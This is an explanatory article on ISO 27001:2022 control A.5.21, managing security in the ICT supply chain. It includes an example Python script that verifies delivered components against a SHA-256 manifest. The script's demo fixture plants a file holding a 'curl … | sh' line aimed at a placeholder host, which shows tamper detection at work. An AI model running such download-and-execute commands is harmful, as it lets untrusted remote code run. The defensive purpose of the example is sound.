
ISO 27001: 2022 A.5.21 Managing information security in the ICT supply chain

This article provides additional information on how you can meet the requirement for the ISO 27001: 2022 A.5.21 Managing information security in the ICT supply chain.

ISO 27001: 2022 Control Description

Processes and procedures shall be defined and implemented to manage the information security risks associated with the ICT products and services supply chain.

Purpose

To maintain an agreed level of information security in supplier relationships.

Guidance on implementation

The following topics should be considered to address information security within the ICT supply chain, in addition to the general information security requirements for supplier relationships:

a) Defining information security requirements for the acquisition of ICT products or services;

b) Requiring ICT services suppliers to propagate the organisation’s security requirements throughout the supply chain if they subcontract parts of the ICT service provided to the organisation;

c) Requiring ICT product suppliers to propagate appropriate security practices throughout the supply chain if these products include components purchased or acquired from other suppliers or entities (e.g. subcontracted software developers and hardware component providers);

d) Requesting that ICT product suppliers provide information describing the software components used in their products;

e) Requesting that ICT product suppliers provide information describing the implemented security functions of their products and the configuration required for secure operation;

f) Implementing a monitoring process and acceptable methods for validating that delivered ICT products and services comply with stated security requirements. Examples of such supplier review methods can include penetration testing and proof or validation of third-party attestations for the supplier’s information security operations;

g) Implementing a process for identifying and documenting product or service components that are critical for maintaining functionality and therefore require increased attention, scrutiny, and further follow-up when built outside the organisation, especially if the supplier outsources aspects of product or service components to other suppliers;

h) Obtaining assurance that critical components and their origin can be traced throughout the supply chain;

i) Obtaining assurance that the delivered ICT products function as expected, without any unexpected or unwanted features;

j) Implementing processes to ensure that components from suppliers are genuine and unaltered from their specification. Example measures include anti-tamper labels, cryptographic hash verifications, or digital signatures. Monitoring for out-of-specification performance can be an indicator of tampering or counterfeits. Prevention and detection of tampering should be implemented at multiple stages in the system development life cycle, including design, development, integration, operations, and maintenance;

k) Obtaining assurance that ICT products achieve required security levels, for example, through formal certification or an evaluation scheme such as the Common Criteria Recognition Arrangement;

l) Defining rules for sharing information regarding the supply chain and any potential issues and compromises among the organisation and suppliers;

m) Implementing specific processes for managing ICT component life cycle and availability, along with associated security risks. This includes managing the risks of components no longer being available due to suppliers going out of business or suppliers no longer providing these components due to technological advancements. Identification of an alternative supplier and the process to transfer software and competence to the alternative supplier should be considered.

The specific ICT supply chain risk management practices are built on top of general information security, quality, project management, and system engineering practices but do not replace them.
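Item j) above names cryptographic hash verification as one way to confirm that delivered components are genuine and unaltered. The script below is an added example written for this page, not code from ISO or from any supplier; it verifies a delivery directory against a SHA-256 manifest in the format produced by GNU `sha256sum`, reports files that are intact, altered, missing, or not listed at all (the "unexpected or unwanted features" of item i), and refuses malformed manifests rather than silently skipping them. The component names and contents in `demo()` are constructed for illustration.

```python
"""Verify delivered ICT components against a supplier's SHA-256 manifest.

Example code added for this page (not from ISO or any vendor).  The manifest
format is that of GNU `sha256sum`: "<64 hex>  <name>" or "<64 hex> *<name>".
"""
import hashlib
import hmac
import os
import re
import tempfile
from pathlib import Path

# One manifest line: 64 hex chars, one space, then a space (text) or '*' (binary), then the name.
_LINE = re.compile(r"^([0-9a-fA-F]{64}) [ *](.+)$")


def parse_manifest(text: str) -> dict[str, str]:
    """Return {filename: expected_sha256_hex}; reject malformed or duplicate lines."""
    expected: dict[str, str] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _LINE.match(line)
        if not m:
            raise ValueError(f"manifest line {lineno} is malformed: {raw!r}")
        digest, name = m.group(1).lower(), m.group(2)
        if name in expected:
            raise ValueError(f"duplicate manifest entry for {name!r}")
        expected[name] = digest
    return expected


def sha256_file(path: Path, chunk: int = 1 << 20) -> str:
    """Stream the file through SHA-256 so large firmware images do not sit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def make_manifest(directory: Path) -> str:
    """What the supplier publishes (and should sign) alongside the delivery."""
    return "".join(f"{sha256_file(directory / n)}  {n}\n" for n in sorted(os.listdir(directory)))


def verify_delivery(manifest_text: str, delivery_dir: Path) -> dict[str, str]:
    """Map each component name to 'ok', 'MISMATCH', 'MISSING' or 'UNLISTED'."""
    expected = parse_manifest(manifest_text)
    results: dict[str, str] = {}
    for name, digest in expected.items():
        path = delivery_dir / name
        if not path.is_file():
            results[name] = "MISSING"
            continue
        actual = sha256_file(path)
        # compare_digest avoids leaking digest prefixes through timing; harmless here, good habit.
        results[name] = "ok" if hmac.compare_digest(actual, digest) else "MISMATCH"
    # Anything delivered that the supplier never listed is a finding, not something to ignore.
    for name in os.listdir(delivery_dir):
        if name not in expected:
            results[name] = "UNLISTED"
    return results


def demo() -> dict[str, str]:
    """Constructed scenario: a clean supplier build versus a tampered delivery."""
    with tempfile.TemporaryDirectory() as tmp:
        supplier = Path(tmp) / "supplier"
        delivered = Path(tmp) / "delivered"
        supplier.mkdir()
        delivered.mkdir()
        # Constructed sample components; the names and bytes are illustrative only.
        components = {
            "agent.bin": b"\x7fELF agent v2.3\n",
            "libtls.so": b"\x7fELF tls library\n",
            "README": b"install notes\n",
        }
        for name, data in components.items():
            (supplier / name).write_bytes(data)
        manifest = make_manifest(supplier)
        # Delivery: agent intact, libtls.so altered by one byte, README dropped, extra file injected.
        (delivered / "agent.bin").write_bytes(components["agent.bin"])
        (delivered / "libtls.so").write_bytes(components["libtls.so"].replace(b"tls", b"tlz"))
        (delivered / "helper.sh").write_bytes(b"curl http://example.invalid | sh\n")
        return verify_delivery(manifest, delivered)


if __name__ == "__main__":
    for name, status in sorted(demo().items()):
        print(f"{status:9} {name}")
```

Running `demo()` flags `libtls.so` as MISMATCH, `README` as MISSING and `helper.sh` as UNLISTED while `agent.bin` passes. A hash manifest only proves that what arrived matches what the supplier hashed; if the manifest travels with the delivery, an attacker who can replace the files can replace the manifest too, so obtain it over a separate trusted channel or verify the supplier's digital signature on it (the signature verification is the part this stdlib-only example omits).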

Other Information

Organisations are advised to work with suppliers to understand the ICT supply chain and any issues that may significantly impact the products and services being provided. The organisation can influence ICT supply chain information security practices by making clear in agreements with their suppliers the matters that should be addressed by other suppliers in the ICT supply chain.

ICT should be acquired from reputable sources. The reliability of software and hardware is a matter of quality control. While it is generally not possible for an organisation to inspect the quality control systems of its vendors, it can make reliable judgments based on the reputation of the vendor.

The ICT supply chain as addressed here includes cloud services.

Examples of ICT supply chains include:

a) Cloud services provisioning, where the cloud service provider relies on software developers, telecommunication service providers, and hardware providers;

b) IoT, where the service involves the device manufacturers, the cloud service providers (e.g. the IoT platform operators), the developers of mobile and web applications, and the vendors of software libraries;

c) Hosting services, where the provider relies on external service desks, including first, second, and third support levels.